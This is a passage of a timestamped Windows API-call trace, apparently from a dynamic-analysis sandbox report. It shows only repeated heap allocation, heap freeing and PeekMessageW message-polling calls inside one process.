lpMsg=0x7dfb8c) returned 0 [0135.779] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e000 | out: hHeap=0x12c0000) returned 1 [0135.779] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.780] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.780] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.780] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.780] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.780] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.780] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.780] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0135.780] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.780] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0135.780] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.780] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.780] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.780] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.781] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.781] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.781] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.781] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0135.781] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.781] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.781] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b64e8 [0135.781] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.781] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b64e8 | out: hHeap=0x12c0000) returned 1 [0135.781] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.781] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.781] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.781] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.781] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0135.781] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.781] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.781] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.781] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.781] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.782] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.782] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.782] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0135.782] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.782] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0135.782] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.782] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.782] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.782] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0135.782] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0135.782] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.782] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.782] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df00 [0135.782] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.782] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df00 | out: hHeap=0x12c0000) returned 1 [0135.782] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.782] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.782] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.782] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.783] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.783] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.783] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.783] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e540 [0135.783] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.783] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e540 | out: hHeap=0x12c0000) returned 1 [0135.783] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.783] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.783] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.783] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.783] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.783] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.783] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.783] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e640 [0135.783] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.784] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e640 | out: hHeap=0x12c0000) returned 1 [0135.784] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.784] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.784] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.784] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.784] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.784] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.784] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.784] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e180 [0135.784] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.784] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e180 | out: hHeap=0x12c0000) returned 1 [0135.784] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.784] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.784] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.784] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.784] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.784] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.784] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.784] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e280 [0135.785] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e280 | out: hHeap=0x12c0000) returned 1 [0135.785] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.785] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.785] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.785] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.785] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e100 [0135.785] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e100 | out: hHeap=0x12c0000) returned 1 [0135.785] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.785] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.785] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.785] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917d8 [0135.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917d8 | out: hHeap=0x12c0000) returned 1 [0135.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.786] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.786] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e280 [0135.786] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.786] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e280 | out: hHeap=0x12c0000) returned 1 [0135.786] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.786] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.786] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.786] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0135.786] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0135.786] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.786] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.786] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0135.786] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.786] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0135.786] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.786] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.786] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.786] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0135.786] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0135.786] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.787] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.787] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df40 [0135.787] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.787] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df40 | out: hHeap=0x12c0000) returned 1 [0135.787] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.787] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0135.787] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.787] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917d8 [0135.787] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917d8 | out: hHeap=0x12c0000) returned 1 [0135.787] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.787] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0135.787] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0135.787] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.787] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0135.787] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.787] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.787] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.787] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917d8 [0135.787] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917d8 | out: hHeap=0x12c0000) returned 1 [0135.787] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.787] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.787] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0135.787] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.787] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.787] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6698 [0135.787] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.788] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6698 | out: hHeap=0x12c0000) returned 1 [0135.788] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.788] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.788] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.788] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.788] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300298 [0135.788] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6710 [0135.788] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.788] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.788] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b66f8 [0135.788] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.788] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.788] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6710 | out: hHeap=0x12c0000) returned 1 [0135.788] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b66f8 | out: hHeap=0x12c0000) returned 1 [0135.788] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300298 | out: hHeap=0x12c0000) returned 1 [0135.788] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.788] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fffa0 [0135.788] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6710 [0135.788] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.788] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.788] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.788] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.789] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.789] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.789] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6578 [0135.789] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x13000e0 [0135.789] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0135.789] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6620 [0135.789] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6578 | out: hHeap=0x12c0000) returned 1 [0135.789] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6710 | out: hHeap=0x12c0000) returned 1 [0135.789] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fffa0 | out: hHeap=0x12c0000) returned 1 [0135.789] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13000e0 | out: hHeap=0x12c0000) returned 1 [0135.789] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.789] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6620 | out: hHeap=0x12c0000) returned 1 [0135.789] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.789] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0135.789] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.789] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.789] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.789] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.789] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.789] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.789] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.789] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e2c0 [0135.789] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.789] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e2c0 | out: hHeap=0x12c0000) returned 1 [0135.790] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.790] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.790] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.790] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.790] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.790] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.790] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.790] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e100 [0135.790] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.790] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e100 | out: hHeap=0x12c0000) returned 1 [0135.790] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.790] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.790] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.790] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.790] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.790] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: 